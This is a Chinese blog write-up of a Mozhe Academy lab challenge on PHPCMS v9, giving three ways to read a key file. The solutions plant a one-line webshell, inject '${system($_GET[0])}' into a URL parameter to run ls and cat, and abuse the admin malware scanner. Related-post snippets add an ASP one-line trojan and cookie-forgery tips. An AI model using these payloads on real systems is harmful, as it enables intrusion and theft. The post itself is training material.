墨者学院—CMS系统漏洞分析溯源(第2题)—3种解法详细介绍

最新推荐文章于 2021-07-04 18:48:55 发布
最新推荐文章于 2021-07-04 18:48:55 发布
阅读量922 收藏 1
点赞数 1
分类专栏: # 墨者学院 文章标签: 信息安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/ploto_cs/article/details/109052222
版权
本文详细介绍了三种方法利用CMS系统漏洞获取后台文件信息:一是通过一句话木马连接,二是利用远程执行命令,三是平台漏洞直接查看。涉及的关键步骤包括探测网址、发现CMS版本、构造查询命令、文件修改与查杀等。对于不同版本的工具连接问题,建议尝试更换版本。同时,文中感谢@臭nana的帮助。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

解法一

解题方法:
使用一句话木马进行连接
操作步骤:
1.对网址进行探测
在这里插入图片描述

2.发现后台版本文件robots.txt
在这里插入图片描述

发现CMS为 PHPCMS v9
后台登录页面为 admin.php
3.浏览
在这里插入图片描述

自动填入密码
浏览源码可以发现密码为:I@vH@U$9n8*
也可以将源码中密码的字段名由password改为text
在这里插入图片描述

4.查看是否与墨者学院-CMS系统漏洞分析溯源(第7题)存在相同的文件上传漏洞

原文回顾:https://blog.youkuaiyun.com/ploto_cs/article/details/108879574

在这里插入图片描述
在这里插入图片描述

文件注入点位于上传处
在这里插入图片描述

jpg格式能够正常上传
在这里插入图片描述

Php始终被拦截,多次试验发现除图片格式的其他格式均被拦截,放弃该处
5.发现在界面—模板风格—详细列表—search—index.html发现文件可以修改可以添加一句话木马
在这里插入图片描述

添加一句话后 保存文件
6.这时木马就已经成功写入在index.html中
注:
此时的链接地址为((不要写错了):

http://219.153.49.228:44865/index.php?m=search

在这里插入图片描述

成功填写信息后即可获取后台文件
在这里插入图片描述

注:一些版本的菜刀还有蚁剑都不能成功连接,可以尝试更换版本再进行连接
感谢@臭nana大佬的援助

原文链接:
https://blog.youkuaiyun.com/weixin_43784056/article/details/85062972?biz_id=102&utm_term=CMS%E7%B3%BB%E7%BB%9F%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90%E6%BA%AF%E6%BA%90%E7%AC%AC2%E9%A2%98&utm_medium=distribute.pc_search_result.none-task-blog-2allsobaiduweb~default-7-85062972&spm=1018.2118.3001.4187

解法二

解题方法:
利用远程执行命令漏洞
操作步骤:
前面与解法一相同,都得成功登录后台
1.在URL中构造 查询命令
命令:

http://219.153.49.228:48673/index.php?0=ls&m=content&c=content&a=public_categorys&type=add&menuid=822;${system($_GET[0])}&pc_hash=vad6K3&from=block

在这里插入图片描述
可以看到包含key的文件出现,在使用命令打开文件
2.在URL中构造 查看key文件的命令
命令:

http://219.153.49.228:48673/index.php?0=cat key_418204667443.php&m=content&c=content&a=public_categorys&type=add&menuid=822;${system($_GET[0])}&pc_hash=vad6K3&from=block

注:第二条命令中除了修改自己的ip时,还得把注意修改key_xxx.php文件,每个人的key不同
修改成功后,进入网址,再查看源代码,就可以看到密钥值了
在这里插入图片描述

解法三

实验方法:
我觉得算是平台漏洞,可以直接看到文件信息
操作步骤:
前面步骤与解法一相同,成功登录后台后
1.在扩展—木马查杀中
可以通过直接修改特征代码,查询key值
在这里插入图片描述
在这里插入图片描述

2.勾选key文件后提交扫描就可以在查杀报告中查看文件详细内容
在这里插入图片描述
在这里插入图片描述

网络信息安全—ploto
再次鸣谢@臭nana大佬的援助

详细--CMS系统漏洞分析溯源(2)
weixin_44537595的博客
09-29 323
CMS系统漏洞分析溯源(2) 访问网站 在访问robots.txt或者扫目录都可以,发现有后台 直接访问admin.php 在木马查杀处,可以对应的特征码进行读取问价内容 如下 找到特征码 完成实验
CMS系统漏洞分析溯源(2)
weixin_50698958的博客
10-06 428
靶场: https://www.mozhe.cn/bug/detail/ajFqNFRadkk2alNtOVRUVm9MSXA2Zz09bW96aGUmozhe 背景介绍 某单位需新上线了一个系统,安全工程师“者”负责对系统的安全检测,确保该系统在上线后不存在安全漏洞。 实训目标 1、了解并熟练使用linux命令; 2、了解PHPCMS的后台地址及其他相关漏洞资料; 3、了解html源码的重要性。 解方向 登录后台后执行linux系统命令,查看web源码。 解思路: 1、打开靶场,首
者 - CMS系统漏洞分析溯源(2)
吃肉唐僧的博客
07-19 614
上网搜索发现,phpcms框架登录后台的默认入口是/index.php?m=admin 发现后台地址 登录系统,摸索一番 发现木马查杀可以查询系统文件 特征密码输入mozhe,遍历所有文件 发现,并且点击打开访问 ...
学院-CMS系统漏洞分析溯源(2)
臭nana的博客
12-18 759
robots.txt爬下目录,发现admin.php 进入发现账号密码已经填好, 登录进去,界面->模板风格->详细列表->search->index.html(修改)写入一句话后保存 然后从主页访问搜索页面 菜刀连接,拿到key ​...
者靶场 中级:CMS系统漏洞分析溯源(第2
qq_43233085的博客
01-17 855
者靶场 中级:CMS系统漏洞分析溯源(第2目背景介绍实训目标解方向解步骤 目 背景介绍 某单位需新上线了一个系统,安全工程师“者”负责对系统的安全检测,确保该系统在上线后不存在安全漏洞。 实训目标 1、了解并熟练使用linux命令; 2、了解PHPCMS的后台地址及其他相关漏洞资料; 3、了解html源码的重要性。 解方向 登录后台后执行linux系统命令,查看web源码。 解...
学院 - CMS系统漏洞分析溯源(2)
多崎巡礼的博客
08-06 1395
登陆后台。 使用admin.php就可以进入后台 用户名密码都是自动填上的,直接登陆就可以。 界面->模板风格->详细列表->search->index.html->将一句话木马添加进去后保存。      ...
学院-CMS系统漏洞分析溯源(第4)
JimWu的博客
09-04 884
CMS系统漏洞分析溯源(第4) 难易程度:★★★ 目类型:身份认证和会话管理 使用工具:FireFox浏览器、wwwscan、菜刀 1.打开靶场,用wwwscan扫一下。 发现后台/admin/home.asp 2.访问后台http://219.153.49.228:49339/admin/home.asp,显示还没有登陆。 3.使用cookie-editor,伪造cookie,添加use...
学院_CMS系统漏洞分析溯源(第9)
weixin_50698958的博客
09-23 718
漏洞概述: 在 一、pandas是什么? 示例:pandas 是基于NumPy 的一种工具,该工具是为了解决数据分析任务而创建的。 二、使用步骤 1.引入库 代码如下(示例): import numpy as np import pandas as pd import matplotlib.pyplot as plt import seaborn as sns import warnings warnings.filterwarnings('ignore') import ssl ssl._
学院 - CMS系统漏洞分析溯源(第5)
多崎巡礼的博客
10-29 1665
phpecms1.3 cookies欺骗漏洞进后台 phpecms1.3/admin/cms_check.php <?php if(!isset($_COOKIE['admin_name'])){ alert_href('非法登录','cms_login.php'); }; ?>   判断如果没有admin_na...
学院-CMS系统漏洞分析溯源(第7)
JimWu的博客
09-04 1030
CMS系统漏洞分析溯源(第7) 难易程度:★★ 目类型:CMS漏洞 使用工具:FireFox浏览器、burpsuite、御剑 1.打开靶场,先在网上查一下dedecms的漏洞。 知道了有能在重置密码页面修改任意用户密码的漏洞 2.用御剑随便扫扫,然后打开burpsuite,访问/member/resetpassword.php,截包。 我们send to repeater,修改get的参数 ?...
学院_CMS系统漏洞分析溯源(第4)
weixin_50698958的博客
10-10 920
靶场: https://www.mozhe.cn/bug/detail/VFRndDEyR1JXVUFySmxzWk14NTRjUT09bW96aGUmozhe 背景介绍 ASPCMS是完全开源的一套CMS建站系统,主要面向企业进行快速的建造简洁,高效,易用,安全的公司企业网站,一般的开发人员就能够使用本系统以最低的成本、最少的人力投入在最短的时间内架设一个功能齐全、性能优异的公司企业网站。ASPCMS是基于ASP+Access(sql2000)开发的网站内容管理系统。 实训目标 1.学习登录绕过
学院-编辑器漏洞分析溯源(2)
a519395243的博客
01-12 793
首先 win10 下可以打开的,用IE 8打开的,其他人说打不开的,可以IE 按F12换版本 找到后台 IP/admin_login.asp 帐号admin  密码 8583213p 点击样式管理下的新增样式 图片类型 cer (IIS6.0平台解析为asp执行),名称随便填,用绝对路径 保存后返回,点击工具后,新增,按钮设置 加插入或修改图片,保存 返回,点击预览,上面操作全在win10 谷歌浏...
学院-CMS系统漏洞分析溯源(第5)
JimWu的博客
09-04 431
CMS系统漏洞分析溯源(第5) 难易程度:★★★★ 目类型:CMS漏洞 使用工具:FireFox浏览器、burpsuite、御剑 1.打开靶场,先用御剑扫一下。 发现后台地址/admin。 2.按F12,在cookie editor中添加一个Name=admin_name,value值随机。 3.访问/admin,截包可以看到cookie中已经添加了admin_name=admin。 4...
学院-CMS系统漏洞分析溯源(3)
ploto_cs的博客
10-09 585
一.漏洞描述 在用户注册或者修改个人资料中,我们可以注入一句话到数据库中,拿到shell 二.影响版本 新云CMS 4.0.0 SP1 三.漏洞复现 1.使用御剑对域名进行探测 登录网址为http://219.153.49.228/login.asp 2.注册用户 在“密码问”插入一句话木马 一句话木马为: <% execute request(“a”)%>” 经过Erlang 中文简体字 GB2312 转 unicode 转换来的 ┼攠數畣整爠煥敵瑳∨≡┩愾 3.检查木马是否上传成功
学院-CMS系统漏洞分析溯源(第9)
ploto_cs的博客
10-15 848
一.解思路 查询版本,直接使用工具破解 二.操作步骤 1.浏览网址 可以看到版本号为Discuz 7.2 2.利用工具查看是否存在漏洞 使用工具dz7.x_faq.py 源码为: #!/usr/bin/env python # -*- coding: gbk -*- # -*- coding: utf-8 -*- # author iswin import sys import hashlib import time import math import base64 import
者-SQL注入漏洞测试(报错盲注)
wh1sper、的博客
07-04 886
者-SQL注入漏洞测试前言一、sqlmap二、手注1.报错注入2.时间注入3.联合查询union被过滤总结 前言 本学院在线靶场 进入目发现是个登录界面,找了好久,最后在关于平台停机维护的通知的页面找到了注入点 判断注入类型,当输入?id=1’ and 1=1 %23时,页面显示正常。 ?id=1' and 1=1 %23 当输入?id=1’ and 1=2 %23时,页面显示不正常。 由此判断注入类型为单字符注入。 一、sqlmap 首先先清理sqlmap的缓存。 python sq
学院WebShell文件上传漏洞分析溯源(第1)
最新发布
04-03
### 学院 WebShell 文件上传漏洞分析溯源方法 #### 背景概述 WebShell 是一种嵌入到目标服务器中的脚本程序,攻击者可以通过它远程控制受害者的服务器。文件上传漏洞通常允许攻击者通过伪造请求或其他手段绕过安全机制,在服务器上放置恶意脚本。 在学院的相关目中提到的内容涉及多个方面,包括 MIME 类型篡改、禁用 JavaScript 绕过前端验证以及利用后缀名规避检测等技术[^1]。 --- #### 漏洞成因分析 文件上传漏洞的主要原因在于服务端对上传文件的安全校验不足。具体表现为以下几个方面: 1. **MIME 类型校验不严格** 攻击者可以使用工具(如 Burp Suite)抓取 HTTP 请求并修改其 MIME 类型字段,从而绕过基于内容类型的限制。例如,将 `.txt` 文件伪装为 `image/jpeg` 格式的图片文件。 2. **依赖客户端验证** 如果仅依靠浏览器端的 JavaScript 验证来阻止非法文件类型,则容易被禁用或绕过。一旦禁用了 JavaScript 功能,就可以轻松提交不符合预期规则的文件[^2]。 3. **扩展名校验缺陷** 当某些应用只检查文件名而未深入解析实际内容时,可能会接受带有特殊后缀名(比如 `.php5`, `.pht` 等变种 PHP 扩展)的文件作为合法输入[^3]。这使得即使表面上看似正常的文件也可能隐藏潜在威胁。 --- #### 解决方案建议 为了有效防范此类问的发生,可以从以下几方面着手改进防护措施: - 加强服务端逻辑设计, 不应单纯信任来自用户的任何数据; - 对于上传过程实施多重过滤策略, 如限定白名单内的 mime-type 和尺寸范围之外还需确认最终存储形式确实无害; - 定期审查现有代码库寻找可能存在的安全隐患点,并及时修补已知漏洞; 以下是实现上述部分功能的一个 Python 示例演示如何初步判断一个给定字符串是否可能是危险命令执行语句的一部分: ```python import re def is_potentially_dangerous(input_string): pattern = r&#39;(?:exec|passthru|shell_exec|system|proc_open|popen)&#39; match_result = re.search(pattern, input_string.lower()) return bool(match_result) test_strings = ["<?php echo &#39;hello&#39;; ?>", "<?php system(&#39;ls&#39;); ?>"] for s in test_strings: print(f"&#39;{s}&#39; -> {is_potentially_dangerous(s)}") ``` 此函数会返回 True 或 False 表明传入参数是否存在可疑的关键字组合。 --- #### 总结 通过对学院案例的学习可以看出,针对 web shell 的防御工作需要综合考虑多层面的因素,从前端界面交互直至后台数据库操作均需保持高度警惕以防万一环节疏漏造成严重后果。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值